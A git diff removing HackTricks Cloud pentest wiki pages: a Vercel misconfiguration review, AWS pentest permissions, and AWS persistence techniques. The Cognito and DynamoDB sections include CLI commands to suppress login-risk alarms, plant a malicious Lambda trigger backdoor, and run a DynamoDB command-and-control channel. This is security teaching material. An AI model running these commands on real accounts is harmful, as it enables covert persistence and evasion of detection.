-{% endhint %} diff --git a/pentesting-ci-cd/vercel-security.md b/pentesting-ci-cd/vercel-security.md deleted file mode 100644 index f46ad4fb1..000000000 --- a/pentesting-ci-cd/vercel-security.md +++ /dev/null @@ -1,463 +0,0 @@ -# Vercel - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**. - -For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also). - -## Project Settings - -### General - -**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. - -#### Security Configurations: - -* **Transfer** - * **Misconfiguration:** Allows to transfer the project to another team - * **Risk:** An attacker could steal the project -* **Delete Project** - * **Misconfiguration:** Allows to delete the project - * **Risk:** Delete the prject - -*** - -### Domains - -**Purpose:** Manage custom domains, DNS settings, and SSL configurations. - -#### Security Configurations: - -* **DNS Configuration Errors** - * **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. - * **Risk:** Domain hijacking, traffic interception, and phishing attacks. -* **SSL/TLS Certificate Management** - * **Misconfiguration:** Using weak or expired SSL/TLS certificates. - * **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. -* **DNSSEC Implementation** - * **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. - * **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks. -* **Environment used per domain** - * **Misconfiguration:** Change the environment used by the domain in production. - * **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. - -*** - -### Environments - -**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. - -#### Security Configurations: - -* **Environment Isolation** - * **Misconfiguration:** Sharing environment variables across environments. - * **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. -* **Access to Sensitive Environments** - * **Misconfiguration:** Allowing broad access to production environments. - * **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. - -*** - -### Environment Variables - -**Purpose:** Manage environment-specific variables and secrets used by the application. - -#### Security Configurations: - -* **Exposing Sensitive Variables** - * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -* **Sensitive disabled** - * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. -* **Shared Environment Variables** - * **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. - -*** - -### Git - -**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. - -#### Security Configurations: - -* **Ignored Build Step (TODO)** - * **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. - * **Risk:** TBD - -*** - -### Integrations - -**Purpose:** Connect third-party services and tools to enhance project functionalities. - -#### Security Configurations: - -* **Insecure Third-Party Integrations** - * **Misconfiguration:** Integrating with untrusted or insecure third-party services. - * **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. -* **Over-Permissioned Integrations** - * **Misconfiguration:** Granting excessive permissions to integrated services. - * **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. -* **Lack of Integration Monitoring** - * **Misconfiguration:** Failing to monitor and audit third-party integrations. - * **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. - -*** - -### Deployment Protection - -**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. - -#### Security Configurations: - -**Vercel Authentication** - -* **Misconfiguration:** Disabling authentication or not enforcing team member checks. -* **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. - -**Protection Bypass for Automation** - -* **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. -* **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. - -**Shareable Links** - -* **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. -* **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. - -**OPTIONS Allowlist** - -* **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. -* **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. - -**Password Protection** - -* **Misconfiguration:** Using weak passwords or sharing them insecurely. -* **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. -* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. - -**Deployment Protection Exceptions** - -* **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. -* **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. -* **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. - -**Trusted IPs** - -* **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. -* **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. -* **Note:** Available on the **Enterprise** plan. - -*** - -### Functions - -**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. - -#### Security Configurations: - -* **Nothing** - -*** - -### Data Cache - -**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. - -#### Security Configurations: - -* **Purge Cache** - * **Misconfiguration:** It allows to delete all the cache. - * **Risk:** Unauthorized users deleting the cache leading to a potential DoS. - -*** - -### Cron Jobs - -**Purpose:** Schedule automated tasks and scripts to run at specified intervals. - -#### Security Configurations: - -* **Disable Cron Job** - * **Misconfiguration:** It allows to disable cron jobs declared inside the code - * **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) - -*** - -### Log Drains - -**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. - -#### Security Configurations: - -* Nothing (managed from teams settings) - -*** - -### Security - -**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. - -#### Security Configurations: - -**Build Logs and Source Protection** - -* **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. -* **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. - -**Git Fork Protection** - -* **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. -* **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. - -**Secure Backend Access with OIDC Federation** - -* **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs. -* **Risk:** Unauthorized access to backend services through flawed authentication flows. - -**Deployment Retention Policy** - -* **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). -* **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. - -**Recently Deleted Deployments** - -* **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. -* **Risk:** Loss of critical deployment history, hindering audits and rollbacks. - -*** - -### Advanced - -**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. - -#### Security Configurations: - -**Directory Listing** - -* **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. -* **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. - -*** - -## Project Firewall - -### Firewall - -#### Security Configurations: - -**Enable Attack Challenge Mode** - -* **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability -* **Risk:** Potential user experience problems. - -### Custom Rules & IP Blocking - -* **Misconfiguration:** Allows to unblock/block traffic -* **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic - -*** - -## Project Deployment - -### Source - -* **Misconfiguration:** Allows access to read the complete source code of the application -* **Risk:** Potential exposure of sensitive information - -### Skew Protection - -* **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. -* **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future - -*** - -## Team Settings - -### General - -#### Security Configurations: - -* **Transfer** - * **Misconfiguration:** Allows to transfer all the projects to another team - * **Risk:** An attacker could steal the projects -* **Delete Project** - * **Misconfiguration:** Allows to delete the team with all the projects - * **Risk:** Delete the projects - -*** - -### Billing - -#### Security Configurations: - -* **Speed Insights Cost Limit** - * **Misconfiguration:** An attacker could increase this number - * **Risk:** Increased costs - -*** - -### Members - -#### Security Configurations: - -* **Add members** - * **Misconfiguration:** An attacker could maintain persitence inviting an account he control - * **Risk:** Attacker persistence -* **Roles** - * **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) - * **Risk**: Increate the exposure of the Vercel Team - -*** - -### Access Groups - -An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects. - -**Potential Misconfigurations:** - -* **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. -* **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. -* **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. -* **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. -* **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. - -*** - -### Log Drains - -#### Security Configurations: - -* **Log Drains to third parties:** - * **Misconfiguration:** An attacker could configure a Log Drain to steal the logs - * **Risk:** Partial persistence - -*** - -### Security & Privacy - -#### Security Configurations: - -* **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. - * **Misconfiguration:** - * Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. - * Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. - * **Risks:** - * **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. - * **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. -* **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. - * **Misconfiguration:** Not adding critical Git scopes to the protected list. -* **Risks:** - * **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. - * **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. -* **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. - * **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. - * **Risks:** - * **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. - * **Data Breach:** Sensitive information like API keys and credentials could be leaked. -* **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. - * **Misconfiguration:**\ - Granting access to audit logs to unauthorized team members. - * **Risks:** - * **Privacy Violations:** Exposure of sensitive user activities and data. - * **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. -* **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. - * **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. - * **Risk:** Maintain persistence -* **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. - * **Misconfiguration:** Leaving IP address visibility enabled without necessity. - * **Risks:** - * **Privacy Violations:** Non-compliance with data protection regulations like GDPR. - * **Legal Repercussions:** Potential fines and penalties for mishandling personal data. -* **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. - * **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. - * **Risks:** - * **Service Denial to Legitimate Users:** Blocking access for valid users or partners. - * **Operational Disruptions:** Loss of service availability for certain regions or clients. - -*** - -### Secure Compute - -**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. - -#### **Potential Misconfigurations and Risks** - -1. **Incorrect AWS Region Selection** - * **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. - * **Risk:** Increased latency, potential data residency compliance issues, and degraded performance. -2. **Overlapping CIDR Blocks** - * **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. - * **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. -3. **Improper VPC Peering Configuration** - * **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). - * **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. -4. **Excessive Project Assignments** - * **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. - * **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. -5. **Inadequate IP Address Management** - * **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. - * **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. -6. **Including Build Containers Unnecessarily** - * **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. - * **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. -7. **Failure to Securely Handle Bypass Secrets** - * **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. - * **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. -8. **Ignoring Region Failover Configurations** - * **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. - * **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. -9. **Exceeding VPC Peering Connection Limits** - * **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). - * **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. -10. **Insecure Network Settings** - * **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. - * **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. - -*** - -### Environment Variables - -**Purpose:** Manage environment-specific variables and secrets used by all the projects. - -#### Security Configurations: - -* **Exposing Sensitive Variables** - * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -* **Sensitive disabled** - * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md deleted file mode 100644 index 868bfe63a..000000000 --- a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md +++ /dev/null @@ -1,43 +0,0 @@ -# AWS - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: - -* The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) -* To run [aws\_iam\_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: - * **access-analyzer:List\*** - * **access-analyzer:Get\*** - * **iam:CreateServiceLinkedRole** - * **access-analyzer:CreateAnalyzer** - * Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) - * **access-analyzer:DeleteAnalyzer** - * Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md deleted file mode 100644 index eeeaca42b..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md +++ /dev/null @@ -1,58 +0,0 @@ -# AWS - API Gateway Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Gateway - -For more information go to: - -{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} -[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) -{% endcontent-ref %} - -### Resource Policy - -Modify the resource policy of the API gateway(s) to grant yourself access to them - -### Modify Lambda Authorizers - -Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ -Or just remove the use of the authorizer. - -### IAM Permissions - -If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ -Or just remove the use of the authorizer. - -### API Keys - -If API keys are used, you could leak them to maintain persistence or even create new ones.\ -Or just remove the use of API keys. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md deleted file mode 100644 index ce324c3a2..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - Cognito Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cognito - -For more information, access: - -{% content-ref url="../aws-services/aws-cognito-enum/" %} -[aws-cognito-enum](../aws-services/aws-cognito-enum/) -{% endcontent-ref %} - -### User persistence - -Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: - -* **Adding a User Pool** controlled by the user to an Identity Pool -* Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** - * Or to an **authenticated Identity Pool** if the attacker can login - * Or **improve the permissions** of the given roles -* **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** -* **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool - -Check how to do these actions in - -{% content-ref url="../aws-privilege-escalation/aws-cognito-privesc.md" %} -[aws-cognito-privesc.md](../aws-privilege-escalation/aws-cognito-privesc.md) -{% endcontent-ref %} - -### `cognito-idp:SetRiskConfiguration` - -An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: - -{% code overflow="wrap" %} -```bash -aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} -``` -{% endcode %} - -By default this is disabled: - -
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md deleted file mode 100644 index c8ddc156e..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md +++ /dev/null @@ -1,91 +0,0 @@ -# AWS - DynamoDB Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### DynamoDB - -For more information access: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -### DynamoDB Triggers with Lambda Backdoor - -Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. - -{% code overflow="wrap" %} -```bash -# Create a malicious Lambda function -aws lambda create-function \ - --function-name MaliciousFunction \ - --runtime nodejs14.x \ - --role \ - --handler index.handler \ - --zip-file fileb://malicious_function.zip \ - --region - -# Associate the Lambda function with the DynamoDB table as a trigger -aws dynamodbstreams describe-stream \ - --table-name TargetTable \ - --region - -# Note the "StreamArn" from the output -aws lambda create-event-source-mapping \ - --function-name MaliciousFunction \ - --event-source \ - --region -``` -{% endcode %} - -To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. - -### DynamoDB as a C2 Channel - -An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. - -```bash -# Create a DynamoDB table for C2 -aws dynamodb create-table \ - --table-name C2Table \ - --attribute-definitions AttributeName=CommandId,AttributeType=S \ - --key-schema AttributeName=CommandId,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --region - -# Insert a command into the table -aws dynamodb put-item \ - --table-name C2Table \ - --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ - --region -``` - -The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md deleted file mode 100644 index e2f500bf0..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - EC2 Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
